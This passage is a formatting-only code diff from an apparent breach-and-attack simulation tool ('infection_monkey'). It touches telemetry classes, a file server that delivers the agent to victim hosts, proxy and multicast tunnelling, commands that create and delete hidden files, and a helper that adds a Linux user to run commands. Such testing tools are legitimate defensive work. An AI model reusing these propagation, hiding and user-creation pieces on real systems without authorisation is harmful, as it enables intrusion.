def get_data(self): data = super(T1064Telem, self).get_data() - data.update({ - 'usage': self.usage - }) + data.update({"usage": self.usage}) return data diff --git a/monkey/infection_monkey/telemetry/attack/t1105_telem.py b/monkey/infection_monkey/telemetry/attack/t1105_telem.py index 454391da8..939e2b3e2 100644 --- a/monkey/infection_monkey/telemetry/attack/t1105_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1105_telem.py @@ -10,16 +10,12 @@ class T1105Telem(AttackTelem): :param dst: IP of machine which downloaded the file :param filename: Uploaded file's name """ - super(T1105Telem, self).__init__('T1105', status) + super(T1105Telem, self).__init__("T1105", status) self.filename = filename self.src = src self.dst = dst def get_data(self): data = super(T1105Telem, self).get_data() - data.update({ - 'filename': self.filename, - 'src': self.src, - 'dst': self.dst - }) + data.update({"filename": self.filename, "src": self.src, "dst": self.dst}) return data diff --git a/monkey/infection_monkey/telemetry/attack/t1107_telem.py b/monkey/infection_monkey/telemetry/attack/t1107_telem.py index ffb69b698..816488f3b 100644 --- a/monkey/infection_monkey/telemetry/attack/t1107_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1107_telem.py @@ -8,12 +8,10 @@ class T1107Telem(AttackTelem): :param status: ScanStatus of technique :param path: Path of deleted dir/file """ - super(T1107Telem, self).__init__('T1107', status) + super(T1107Telem, self).__init__("T1107", status) self.path = path def get_data(self): data = super(T1107Telem, self).get_data() - data.update({ - 'path': self.path - }) + data.update({"path": self.path}) return data diff --git a/monkey/infection_monkey/telemetry/attack/t1197_telem.py b/monkey/infection_monkey/telemetry/attack/t1197_telem.py index 769f93823..c5c98a9d0 100644 --- a/monkey/infection_monkey/telemetry/attack/t1197_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1197_telem.py @@ -12,12 +12,10 @@ class T1197Telem(VictimHostTelem): :param machine: VictimHost obj from model/host.py :param usage: Usage string """ - super(T1197Telem, self).__init__('T1197', status, machine) + super(T1197Telem, self).__init__("T1197", status, machine) self.usage = usage def get_data(self): data = super(T1197Telem, self).get_data() - data.update({ - 'usage': self.usage - }) + data.update({"usage": self.usage}) return data diff --git a/monkey/infection_monkey/telemetry/attack/t1222_telem.py b/monkey/infection_monkey/telemetry/attack/t1222_telem.py index 4708c230a..30a0314ae 100644 --- a/monkey/infection_monkey/telemetry/attack/t1222_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1222_telem.py @@ -9,12 +9,10 @@ class T1222Telem(VictimHostTelem): :param command: command used to change permissions :param machine: VictimHost type object """ - super(T1222Telem, self).__init__('T1222', status, machine) + super(T1222Telem, self).__init__("T1222", status, machine) self.command = command def get_data(self): data = super(T1222Telem, self).get_data() - data.update({ - 'command': self.command - }) + data.update({"command": self.command}) return data diff --git a/monkey/infection_monkey/telemetry/attack/usage_telem.py b/monkey/infection_monkey/telemetry/attack/usage_telem.py index 4b47d8be3..3066fe3d3 100644 --- a/monkey/infection_monkey/telemetry/attack/usage_telem.py +++ b/monkey/infection_monkey/telemetry/attack/usage_telem.py @@ -2,7 +2,6 @@ from infection_monkey.telemetry.attack.attack_telem import AttackTelem class UsageTelem(AttackTelem): - def __init__(self, 
technique, status, usage): """ :param technique: Id of technique @@ -14,7 +13,5 @@ class UsageTelem(AttackTelem): def get_data(self): data = super(UsageTelem, self).get_data() - data.update({ - 'usage': self.usage - }) + data.update({"usage": self.usage}) return data diff --git a/monkey/infection_monkey/telemetry/attack/victim_host_telem.py b/monkey/infection_monkey/telemetry/attack/victim_host_telem.py index 9e277926c..9dc812b14 100644 --- a/monkey/infection_monkey/telemetry/attack/victim_host_telem.py +++ b/monkey/infection_monkey/telemetry/attack/victim_host_telem.py @@ -4,7 +4,6 @@ __author__ = "VakarisZ" class VictimHostTelem(AttackTelem): - def __init__(self, technique, status, machine): """ ATT&CK telemetry. @@ -14,11 +13,9 @@ class VictimHostTelem(AttackTelem): :param machine: VictimHost obj from model/host.py """ super(VictimHostTelem, self).__init__(technique, status) - self.machine = {'domain_name': machine.domain_name, 'ip_addr': machine.ip_addr} + self.machine = {"domain_name": machine.domain_name, "ip_addr": machine.ip_addr} def get_data(self): data = super(VictimHostTelem, self).get_data() - data.update({ - 'machine': self.machine - }) + data.update({"machine": self.machine}) return data diff --git a/monkey/infection_monkey/telemetry/base_telem.py b/monkey/infection_monkey/telemetry/base_telem.py index 96e7a6288..e179a24df 100644 --- a/monkey/infection_monkey/telemetry/base_telem.py +++ b/monkey/infection_monkey/telemetry/base_telem.py @@ -7,7 +7,7 @@ from infection_monkey.control import ControlClient logger = logging.getLogger(__name__) LOGGED_DATA_LENGTH = 300 # How many characters of telemetry data will be logged -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" # TODO: Rework the interface for telemetry; this class has too many responsibilities # (i.e. 
too many reasons to change): diff --git a/monkey/infection_monkey/telemetry/exploit_telem.py b/monkey/infection_monkey/telemetry/exploit_telem.py index 0a33d1484..4f39a2145 100644 --- a/monkey/infection_monkey/telemetry/exploit_telem.py +++ b/monkey/infection_monkey/telemetry/exploit_telem.py @@ -5,7 +5,6 @@ __author__ = "itay.mizeretz" class ExploitTelem(BaseTelem): - def __init__(self, exploiter, result): """ Default exploit telemetry constructor @@ -20,9 +19,9 @@ class ExploitTelem(BaseTelem): def get_data(self): return { - 'result': self.result, - 'machine': self.exploiter.host.__dict__, - 'exploiter': self.exploiter.__class__.__name__, - 'info': self.exploiter.exploit_info, - 'attempts': self.exploiter.exploit_attempts + "result": self.result, + "machine": self.exploiter.host.__dict__, + "exploiter": self.exploiter.__class__.__name__, + "info": self.exploiter.exploit_info, + "attempts": self.exploiter.exploit_attempts, } diff --git a/monkey/infection_monkey/telemetry/post_breach_telem.py b/monkey/infection_monkey/telemetry/post_breach_telem.py index 15aa41247..6dafa3c0c 100644 --- a/monkey/infection_monkey/telemetry/post_breach_telem.py +++ b/monkey/infection_monkey/telemetry/post_breach_telem.py @@ -7,7 +7,6 @@ __author__ = "itay.mizeretz" class PostBreachTelem(BaseTelem): - def __init__(self, pba, result): """ Default post breach telemetry constructor @@ -23,11 +22,11 @@ class PostBreachTelem(BaseTelem): def get_data(self): return { - 'command': self.pba.command, - 'result': self.result, - 'name': self.pba.name, - 'hostname': self.hostname, - 'ip': self.ip + "command": self.pba.command, + "result": self.result, + "name": self.pba.name, + "hostname": self.hostname, + "ip": self.ip, } @staticmethod diff --git a/monkey/infection_monkey/telemetry/scan_telem.py b/monkey/infection_monkey/telemetry/scan_telem.py index a4dac1396..c606a2cc2 100644 --- a/monkey/infection_monkey/telemetry/scan_telem.py +++ b/monkey/infection_monkey/telemetry/scan_telem.py @@ -5,7 +5,6 @@ __author__ = "itay.mizeretz" class ScanTelem(BaseTelem): - def __init__(self, machine): """ Default scan telemetry constructor @@ -17,7 +16,4 @@ class ScanTelem(BaseTelem): telem_category = TelemCategoryEnum.SCAN def get_data(self): - return { - 'machine': self.machine.as_dict(), - 'service_count': len(self.machine.services) - } + return {"machine": self.machine.as_dict(), "service_count": len(self.machine.services)} diff --git a/monkey/infection_monkey/telemetry/scoutsuite_telem.py b/monkey/infection_monkey/telemetry/scoutsuite_telem.py index ba112f8b9..f6bb123d4 100644 --- a/monkey/infection_monkey/telemetry/scoutsuite_telem.py +++ b/monkey/infection_monkey/telemetry/scoutsuite_telem.py @@ -5,7 +5,6 @@ from infection_monkey.telemetry.base_telem import BaseTelem class ScoutSuiteTelem(BaseTelem): - def __init__(self, provider: BaseProvider): super().__init__() self.provider_data = provider @@ -14,6 +13,4 @@ class ScoutSuiteTelem(BaseTelem): telem_category = TelemCategoryEnum.SCOUTSUITE def get_data(self): - return { - 'data': self.provider_data - } + return {"data": self.provider_data} diff --git a/monkey/infection_monkey/telemetry/state_telem.py b/monkey/infection_monkey/telemetry/state_telem.py index 9ecd53c20..06fc1794c 100644 --- a/monkey/infection_monkey/telemetry/state_telem.py +++ b/monkey/infection_monkey/telemetry/state_telem.py @@ -5,7 +5,6 @@ __author__ = "itay.mizeretz" class StateTelem(BaseTelem): - def __init__(self, is_done, version="Unknown"): """ Default state telemetry constructor @@ -18,7 +17,4 @@ class 
StateTelem(BaseTelem): telem_category = TelemCategoryEnum.STATE def get_data(self): - return { - 'done': self.is_done, - 'version': self.version - } + return {"done": self.is_done, "version": self.version} diff --git a/monkey/infection_monkey/telemetry/system_info_telem.py b/monkey/infection_monkey/telemetry/system_info_telem.py index a7ac21456..45f395201 100644 --- a/monkey/infection_monkey/telemetry/system_info_telem.py +++ b/monkey/infection_monkey/telemetry/system_info_telem.py @@ -5,7 +5,6 @@ __author__ = "itay.mizeretz" class SystemInfoTelem(BaseTelem): - def __init__(self, system_info): """ Default system info telemetry constructor diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py index 59eefc150..f519b8153 100644 --- a/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py +++ b/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py @@ -24,7 +24,7 @@ def test_victim_host_telem_send(victim_host_telem_test_instance, spy_send_teleme expected_data = { "status": STATUS.value, "technique": TECHNIQUE, - "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP} + "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP}, } expected_data = json.dumps(expected_data, cls=victim_host_telem_test_instance.json_encoder) assert spy_send_telemetry.data == expected_data diff --git a/monkey/infection_monkey/telemetry/trace_telem.py b/monkey/infection_monkey/telemetry/trace_telem.py index dfe3f762b..8beec1181 100644 --- a/monkey/infection_monkey/telemetry/trace_telem.py +++ b/monkey/infection_monkey/telemetry/trace_telem.py @@ -9,7 +9,6 @@ LOG = logging.getLogger(__name__) class TraceTelem(BaseTelem): - def __init__(self, msg): """ Default trace telemetry constructor @@ -22,6 +21,4 @@ class TraceTelem(BaseTelem): telem_category = TelemCategoryEnum.TRACE def get_data(self): - return { - 'msg': self.msg - } + return {"msg": self.msg} diff --git a/monkey/infection_monkey/telemetry/tunnel_telem.py b/monkey/infection_monkey/telemetry/tunnel_telem.py index b4e4a07e6..05f057ee9 100644 --- a/monkey/infection_monkey/telemetry/tunnel_telem.py +++ b/monkey/infection_monkey/telemetry/tunnel_telem.py @@ -6,15 +6,14 @@ __author__ = "itay.mizeretz" class TunnelTelem(BaseTelem): - def __init__(self): """ Default tunnel telemetry constructor """ super(TunnelTelem, self).__init__() - self.proxy = ControlClient.proxies.get('https') + self.proxy = ControlClient.proxies.get("https") telem_category = TelemCategoryEnum.TUNNEL def get_data(self): - return {'proxy': self.proxy} + return {"proxy": self.proxy} diff --git a/monkey/infection_monkey/transport/base.py b/monkey/infection_monkey/transport/base.py index a02d86708..77be3f3af 100644 --- a/monkey/infection_monkey/transport/base.py +++ b/monkey/infection_monkey/transport/base.py @@ -5,7 +5,7 @@ g_last_served = None class TransportProxyBase(Thread): - def __init__(self, local_port, dest_host=None, dest_port=None, local_host=''): + def __init__(self, local_port, dest_host=None, dest_port=None, local_host=""): global g_last_served self.local_host = local_host diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py index e2ed053af..e2b3a69da 100644 --- a/monkey/infection_monkey/transport/http.py +++ b/monkey/infection_monkey/transport/http.py @@ -15,7 +15,7 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT from infection_monkey.network.tools import get_interface_to_target from 
infection_monkey.transport.base import TransportProxyBase, update_last_serve_time -__author__ = 'hoffer' +__author__ = "hoffer" LOG = getLogger(__name__) @@ -65,11 +65,11 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): f.close() def send_head(self): - if self.path != '/' + urllib.parse.quote(os.path.basename(self.filename)): + if self.path != "/" + urllib.parse.quote(os.path.basename(self.filename)): self.send_error(500, "") return None, 0, 0 try: - f = monkeyfs.open(self.filename, 'rb') + f = monkeyfs.open(self.filename, "rb") except IOError: self.send_error(404, "File not found") return None, 0, 0 @@ -78,7 +78,7 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): end_range = size if "Range" in self.headers: - s, e = self.headers['range'][6:].split('-', 1) + s, e = self.headers["range"][6:].split("-", 1) sl = len(s) el = len(e) if sl > 0: @@ -98,33 +98,41 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): self.send_response(200) self.send_header("Content-type", "application/octet-stream") - self.send_header("Content-Range", 'bytes ' + str(start_range) + '-' + str(end_range - 1) + '/' + str(size)) + self.send_header( + "Content-Range", + "bytes " + str(start_range) + "-" + str(end_range - 1) + "/" + str(size), + ) self.send_header("Content-Length", min(end_range - start_range, size)) self.end_headers() return f, start_range, end_range def log_message(self, format_string, *args): - LOG.debug("FileServHTTPRequestHandler: %s - - [%s] %s" % (self.address_string(), - self.log_date_time_string(), - format_string % args)) + LOG.debug( + "FileServHTTPRequestHandler: %s - - [%s] %s" + % (self.address_string(), self.log_date_time_string(), format_string % args) + ) class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): timeout = 30 # timeout with clients, set to None not to make persistent connection - proxy_via = None # pseudonym of the proxy in Via header, set to None not to modify original Via header + proxy_via = ( + None # pseudonym of the proxy in Via header, set to None not to modify original Via header + ) def do_POST(self): try: - content_length = int(self.headers['Content-Length']) + content_length = int(self.headers["Content-Length"]) post_data = self.rfile.read(content_length).decode() LOG.info("Received bootloader's request: {}".format(post_data)) try: dest_path = self.path - r = requests.post(url=dest_path, - data=post_data, - verify=False, - proxies=infection_monkey.control.ControlClient.proxies, - timeout=SHORT_REQUEST_TIMEOUT) + r = requests.post( + url=dest_path, + data=post_data, + verify=False, + proxies=infection_monkey.control.ControlClient.proxies, + timeout=SHORT_REQUEST_TIMEOUT, + ) self.send_response(r.status_code) except requests.exceptions.ConnectionError as e: LOG.error("Couldn't forward request to the island: {}".format(e)) @@ -144,18 +152,21 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): LOG.info("Received a connect request!") # just provide a tunnel, transfer the data with no modification req = self - req.path = "https://%s/" % req.path.replace(':443', '') + req.path = "https://%s/" % req.path.replace(":443", "") u = urlsplit(req.path) address = (u.hostname, u.port or 443) try: conn = socket.create_connection(address) except socket.error as e: - LOG.debug("HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s" % (repr(address), e)) + LOG.debug( + "HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s" + % (repr(address), e) + ) 
self.send_error(504) # 504 Gateway Timeout return - self.send_response(200, 'Connection Established') - self.send_header('Connection', 'close') + self.send_response(200, "Connection Established") + self.send_header("Connection", "close") self.end_headers() conns = [self.connection, conn] @@ -175,8 +186,10 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): conn.close() def log_message(self, format_string, *args): - LOG.debug("HTTPConnectProxyHandler: %s - [%s] %s" % - (self.address_string(), self.log_date_time_string(), format_string % args)) + LOG.debug( + "HTTPConnectProxyHandler: %s - [%s] %s" + % (self.address_string(), self.log_date_time_string(), format_string % args) + ) class HTTPServer(threading.Thread): @@ -198,11 +211,13 @@ class HTTPServer(threading.Thread): @staticmethod def report_download(dest=None): - LOG.info('File downloaded from (%s,%s)' % (dest[0], dest[1])) - TempHandler.T1105Telem(TempHandler.ScanStatus.USED, - get_interface_to_target(dest[0]), - dest[0], - self._filename).send() + LOG.info("File downloaded from (%s,%s)" % (dest[0], dest[1])) + TempHandler.T1105Telem( + TempHandler.ScanStatus.USED, + get_interface_to_target(dest[0]), + dest[0], + self._filename, + ).send() self.downloads += 1 if not self.downloads < self.max_downloads: return True @@ -229,6 +244,7 @@ class LockedHTTPServer(threading.Thread): and subsequent code will be able to continue to execute. That way subsequent code will always call already running HTTP server """ + # Seconds to wait until server stops STOP_TIMEOUT = 5 @@ -247,15 +263,18 @@ class LockedHTTPServer(threading.Thread): class TempHandler(FileServHTTPRequestHandler): from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem + filename = self._filename @staticmethod def report_download(dest=None): - LOG.info('File downloaded from (%s,%s)' % (dest[0], dest[1])) - TempHandler.T1105Telem(TempHandler.ScanStatus.USED, - get_interface_to_target(dest[0]), - dest[0], - self._filename).send() + LOG.info("File downloaded from (%s,%s)" % (dest[0], dest[1])) + TempHandler.T1105Telem( + TempHandler.ScanStatus.USED, + get_interface_to_target(dest[0]), + dest[0], + self._filename, + ).send() self.downloads += 1 if not self.downloads < self.max_downloads: return True diff --git a/monkey/infection_monkey/transport/tcp.py b/monkey/infection_monkey/transport/tcp.py index dac2a0938..60a995edc 100644 --- a/monkey/infection_monkey/transport/tcp.py +++ b/monkey/infection_monkey/transport/tcp.py @@ -47,7 +47,6 @@ class SocketsPipe(Thread): class TcpProxy(TransportProxyBase): - def run(self): pipes = [] l_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) @@ -71,7 +70,13 @@ class TcpProxy(TransportProxyBase): pipe = SocketsPipe(source, dest) pipes.append(pipe) - LOG.debug("piping sockets %s:%s->%s:%s", address[0], address[1], self.dest_host, self.dest_port) + LOG.debug( + "piping sockets %s:%s->%s:%s", + address[0], + address[1], + self.dest_host, + self.dest_port, + ) pipe.start() l_socket.close() diff --git a/monkey/infection_monkey/tunnel.py b/monkey/infection_monkey/tunnel.py index 6d261ce2b..83e03fec2 100644 --- a/monkey/infection_monkey/tunnel.py +++ b/monkey/infection_monkey/tunnel.py @@ -10,25 +10,27 @@ from infection_monkey.network.info import get_free_tcp_port, local_ips from infection_monkey.network.tools import check_tcp_port, get_interface_to_target from infection_monkey.transport.base import get_last_serve_time -__author__ = 'hoffer' +__author__ = "hoffer" LOG = 
logging.getLogger(__name__) -MCAST_GROUP = '224.1.1.1' +MCAST_GROUP = "224.1.1.1" MCAST_PORT = 5007 BUFFER_READ = 1024 DEFAULT_TIMEOUT = 10 QUIT_TIMEOUT = 60 * 10 # 10 minutes -def _set_multicast_socket(timeout=DEFAULT_TIMEOUT, adapter=''): +def _set_multicast_socket(timeout=DEFAULT_TIMEOUT, adapter=""): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.settimeout(timeout) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((adapter, MCAST_PORT)) - sock.setsockopt(socket.IPPROTO_IP, - socket.IP_ADD_MEMBERSHIP, - struct.pack("4sl", socket.inet_aton(MCAST_GROUP), socket.INADDR_ANY)) + sock.setsockopt( + socket.IPPROTO_IP, + socket.IP_ADD_MEMBERSHIP, + struct.pack("4sl", socket.inet_aton(MCAST_GROUP), socket.INADDR_ANY), + ) return sock @@ -60,8 +62,8 @@ def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT): l_ips = local_ips() if default: - if default.find(':') != -1: - address, port = default.split(':', 1) + if default.find(":") != -1: + address, port = default.split(":", 1) if _check_tunnel(address, port): return address, port @@ -76,14 +78,14 @@ def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT): while True: try: answer, address = sock.recvfrom(BUFFER_READ) - if answer not in [b'?', b'+', b'-']: + if answer not in [b"?", b"+", b"-"]: tunnels.append(answer) except socket.timeout: break for tunnel in tunnels: - if tunnel.find(':') != -1: - address, port = tunnel.split(':', 1) + if tunnel.find(":") != -1: + address, port = tunnel.split(":", 1) if address in l_ips: continue @@ -135,28 +137,34 @@ class MonkeyTunnel(Thread): LOG.info("Machine firewalled, listen not allowed, not running tunnel.") return - proxy = self._proxy_class(local_port=self.local_port, dest_host=self._target_addr, dest_port=self._target_port) - LOG.info("Running tunnel using proxy class: %s, listening on port %s, routing to: %s:%s", - proxy.__class__.__name__, - self.local_port, - self._target_addr, - self._target_port) + proxy = self._proxy_class( + local_port=self.local_port, dest_host=self._target_addr, dest_port=self._target_port + ) + LOG.info( + "Running tunnel using proxy class: %s, listening on port %s, routing to: %s:%s", + proxy.__class__.__name__, + self.local_port, + self._target_addr, + self._target_port, + ) proxy.start() while not self._stopped: try: search, address = self._broad_sock.recvfrom(BUFFER_READ) - if b'?' == search: + if b"?" 
== search: ip_match = get_interface_to_target(address[0]) if ip_match: - answer = '%s:%d' % (ip_match, self.local_port) - LOG.debug("Got tunnel request from %s, answering with %s", address[0], answer) + answer = "%s:%d" % (ip_match, self.local_port) + LOG.debug( + "Got tunnel request from %s, answering with %s", address[0], answer + ) self._broad_sock.sendto(answer.encode(), (address[0], MCAST_PORT)) - elif b'+' == search: + elif b"+" == search: if not address[0] in self._clients: LOG.debug("Tunnel control: Added %s to watchlist", address[0]) self._clients.append(address[0]) - elif b'-' == search: + elif b"-" == search: LOG.debug("Tunnel control: Removed %s from watchlist", address[0]) self._clients = [client for client in self._clients if client != address[0]] @@ -169,7 +177,7 @@ class MonkeyTunnel(Thread): while self._clients and (time.time() - get_last_serve_time() < QUIT_TIMEOUT): try: search, address = self._broad_sock.recvfrom(BUFFER_READ) - if b'-' == search: + if b"-" == search: LOG.debug("Tunnel control: Removed %s from watchlist", address[0]) self._clients = [client for client in self._clients if client != address[0]] except socket.timeout: @@ -187,7 +195,7 @@ class MonkeyTunnel(Thread): return ip_match = get_interface_to_target(host.ip_addr) - host.default_tunnel = '%s:%d' % (ip_match, self.local_port) + host.default_tunnel = "%s:%d" % (ip_match, self.local_port) def stop(self): self._stopped = True diff --git a/monkey/infection_monkey/utils/auto_new_user.py b/monkey/infection_monkey/utils/auto_new_user.py index bc2c9452b..26c1c837c 100644 --- a/monkey/infection_monkey/utils/auto_new_user.py +++ b/monkey/infection_monkey/utils/auto_new_user.py @@ -18,7 +18,7 @@ class AutoNewUser(metaclass=abc.ABCMeta): ... # Logged off and deleted ... - """ + """ def __init__(self, username, password): self.username = username diff --git a/monkey/infection_monkey/utils/environment.py b/monkey/infection_monkey/utils/environment.py index 40a70ce58..2ead5a837 100644 --- a/monkey/infection_monkey/utils/environment.py +++ b/monkey/infection_monkey/utils/environment.py @@ -7,7 +7,7 @@ def is_64bit_windows_os(): """ Checks for 64 bit Windows OS using environment variables. 
""" - return 'PROGRAMFILES(X86)' in os.environ + return "PROGRAMFILES(X86)" in os.environ def is_64bit_python(): diff --git a/monkey/infection_monkey/utils/hidden_files.py b/monkey/infection_monkey/utils/hidden_files.py index 863d1a277..cc973cc5e 100644 --- a/monkey/infection_monkey/utils/hidden_files.py +++ b/monkey/infection_monkey/utils/hidden_files.py @@ -1,11 +1,16 @@ import subprocess from infection_monkey.utils.environment import is_windows_os -from infection_monkey.utils.linux.hidden_files import (get_linux_commands_to_delete, get_linux_commands_to_hide_files, - get_linux_commands_to_hide_folders) -from infection_monkey.utils.windows.hidden_files import (get_windows_commands_to_delete, - get_windows_commands_to_hide_files, - get_windows_commands_to_hide_folders) +from infection_monkey.utils.linux.hidden_files import ( + get_linux_commands_to_delete, + get_linux_commands_to_hide_files, + get_linux_commands_to_hide_folders, +) +from infection_monkey.utils.windows.hidden_files import ( + get_windows_commands_to_delete, + get_windows_commands_to_hide_files, + get_windows_commands_to_hide_folders, +) def get_commands_to_hide_files(): @@ -21,6 +26,9 @@ def get_commands_to_hide_folders(): def cleanup_hidden_files(is_windows=is_windows_os()): - subprocess.run(get_windows_commands_to_delete() if is_windows # noqa: DUO116 - else ' '.join(get_linux_commands_to_delete()), - shell=True) + subprocess.run( + get_windows_commands_to_delete() + if is_windows # noqa: DUO116 + else " ".join(get_linux_commands_to_delete()), + shell=True, + ) diff --git a/monkey/infection_monkey/utils/linux/hidden_files.py b/monkey/infection_monkey/utils/linux/hidden_files.py index 468318cf8..62e43adf5 100644 --- a/monkey/infection_monkey/utils/linux/hidden_files.py +++ b/monkey/infection_monkey/utils/linux/hidden_files.py @@ -1,34 +1,28 @@ -HIDDEN_FILE = '$HOME/.monkey-hidden-file' -HIDDEN_FOLDER = '$HOME/.monkey-hidden-folder' +HIDDEN_FILE = "$HOME/.monkey-hidden-file" +HIDDEN_FOLDER = "$HOME/.monkey-hidden-folder" def get_linux_commands_to_hide_files(): return [ - 'touch', # create file + "touch", # create file + HIDDEN_FILE, + "&&" 'echo "Successfully created hidden file: {}" |'.format(HIDDEN_FILE), # output + "tee -a", # and write to file HIDDEN_FILE, - '&&' - 'echo \"Successfully created hidden file: {}\" |'.format(HIDDEN_FILE), # output - 'tee -a', # and write to file - HIDDEN_FILE ] def get_linux_commands_to_hide_folders(): return [ - 'mkdir', # make directory + "mkdir", # make directory HIDDEN_FOLDER, - '&& touch', # create file - '{}/{}'.format(HIDDEN_FOLDER, 'some-file'), # random file in hidden folder - '&& echo \"Successfully created hidden folder: {}\" |'.format(HIDDEN_FOLDER), # output - 'tee -a', # and write to file - '{}/{}'.format(HIDDEN_FOLDER, 'some-file') # random file in hidden folder + "&& touch", # create file + "{}/{}".format(HIDDEN_FOLDER, "some-file"), # random file in hidden folder + '&& echo "Successfully created hidden folder: {}" |'.format(HIDDEN_FOLDER), # output + "tee -a", # and write to file + "{}/{}".format(HIDDEN_FOLDER, "some-file"), # random file in hidden folder ] def get_linux_commands_to_delete(): - return [ - 'rm', # remove - '-rf', # force delete recursively - HIDDEN_FILE, - HIDDEN_FOLDER - ] + return ["rm", "-rf", HIDDEN_FILE, HIDDEN_FOLDER] # remove # force delete recursively diff --git a/monkey/infection_monkey/utils/linux/users.py b/monkey/infection_monkey/utils/linux/users.py index 34becb8f7..9144a24ec 100644 --- a/monkey/infection_monkey/utils/linux/users.py +++ 
b/monkey/infection_monkey/utils/linux/users.py @@ -10,22 +10,20 @@ logger = logging.getLogger(__name__) def get_linux_commands_to_add_user(username): return [ - 'useradd', # https://linux.die.net/man/8/useradd - '-M', # Do not create homedir - '--expiredate', # The date on which the user account will be disabled. - datetime.datetime.today().strftime('%Y-%m-%d'), - '--inactive', # The number of days after a password expires until the account is permanently disabled. - '0', # A value of 0 disables the account as soon as the password has expired - '-c', # Comment - 'MONKEY_USER', # Comment - username] + "useradd", # https://linux.die.net/man/8/useradd + "-M", # Do not create homedir + "--expiredate", # The date on which the user account will be disabled. + datetime.datetime.today().strftime("%Y-%m-%d"), + "--inactive", # The number of days after a password expires until the account is permanently disabled. + "0", # A value of 0 disables the account as soon as the password has expired + "-c", # Comment + "MONKEY_USER", # Comment + username, + ] def get_linux_commands_to_delete_user(username): - return [ - 'deluser', - username - ] + return ["deluser", username] class AutoNewLinuxUser(AutoNewUser): @@ -41,18 +39,30 @@ class AutoNewLinuxUser(AutoNewUser): super(AutoNewLinuxUser, self).__init__(username, password) commands_to_add_user = get_linux_commands_to_add_user(username) - logger.debug("Trying to add {} with commands {}".format(self.username, str(commands_to_add_user))) - _ = subprocess.check_output(' '.join(commands_to_add_user), stderr=subprocess.STDOUT, shell=True) + logger.debug( + "Trying to add {} with commands {}".format(self.username, str(commands_to_add_user)) + ) + _ = subprocess.check_output( + " ".join(commands_to_add_user), stderr=subprocess.STDOUT, shell=True + ) def __enter__(self): return self # No initialization/logging on needed in Linux def run_as(self, command): - command_as_new_user = "sudo -u {username} {command}".format(username=self.username, command=command) + command_as_new_user = "sudo -u {username} {command}".format( + username=self.username, command=command + ) return os.system(command_as_new_user) def __exit__(self, exc_type, exc_val, exc_tb): # delete the user. 
commands_to_delete_user = get_linux_commands_to_delete_user(self.username) - logger.debug("Trying to delete {} with commands {}".format(self.username, str(commands_to_delete_user))) - _ = subprocess.check_output(" ".join(commands_to_delete_user), stderr=subprocess.STDOUT, shell=True) + logger.debug( + "Trying to delete {} with commands {}".format( + self.username, str(commands_to_delete_user) + ) + ) + _ = subprocess.check_output( + " ".join(commands_to_delete_user), stderr=subprocess.STDOUT, shell=True + ) diff --git a/monkey/infection_monkey/utils/monkey_log_path.py b/monkey/infection_monkey/utils/monkey_log_path.py index ad80bc73d..0b97f83b9 100644 --- a/monkey/infection_monkey/utils/monkey_log_path.py +++ b/monkey/infection_monkey/utils/monkey_log_path.py @@ -5,10 +5,16 @@ from infection_monkey.config import WormConfiguration def get_monkey_log_path(): - return os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" \ + return ( + os.path.expandvars(WormConfiguration.monkey_log_path_windows) + if sys.platform == "win32" else WormConfiguration.monkey_log_path_linux + ) def get_dropper_log_path(): - return os.path.expandvars(WormConfiguration.dropper_log_path_windows) if sys.platform == "win32" \ + return ( + os.path.expandvars(WormConfiguration.dropper_log_path_windows) + if sys.platform == "win32" else WormConfiguration.dropper_log_path_linux + ) diff --git a/monkey/infection_monkey/utils/plugins/plugin.py b/monkey/infection_monkey/utils/plugins/plugin.py index 662c0e35a..f72585cd3 100644 --- a/monkey/infection_monkey/utils/plugins/plugin.py +++ b/monkey/infection_monkey/utils/plugins/plugin.py @@ -11,14 +11,13 @@ LOG = logging.getLogger(__name__) def _get_candidate_files(base_package_file): files = glob.glob(join(dirname(base_package_file), "*.py")) - return [basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')] + return [basename(f)[:-3] for f in files if isfile(f) and not f.endswith("__init__.py")] -PluginType = TypeVar('PluginType', bound='Plugin') +PluginType = TypeVar("PluginType", bound="Plugin") class Plugin(metaclass=ABCMeta): - @staticmethod @abstractmethod def should_run(class_name: str) -> bool: @@ -33,15 +32,20 @@ class Plugin(metaclass=ABCMeta): """ objects = [] candidate_files = _get_candidate_files(cls.base_package_file()) - LOG.info("looking for classes of type {} in {}".format(cls.__name__, cls.base_package_name())) + LOG.info( + "looking for classes of type {} in {}".format(cls.__name__, cls.base_package_name()) + ) # Go through all of files for file in candidate_files: # Import module from that file - module = importlib.import_module('.' + file, cls.base_package_name()) + module = importlib.import_module("." 
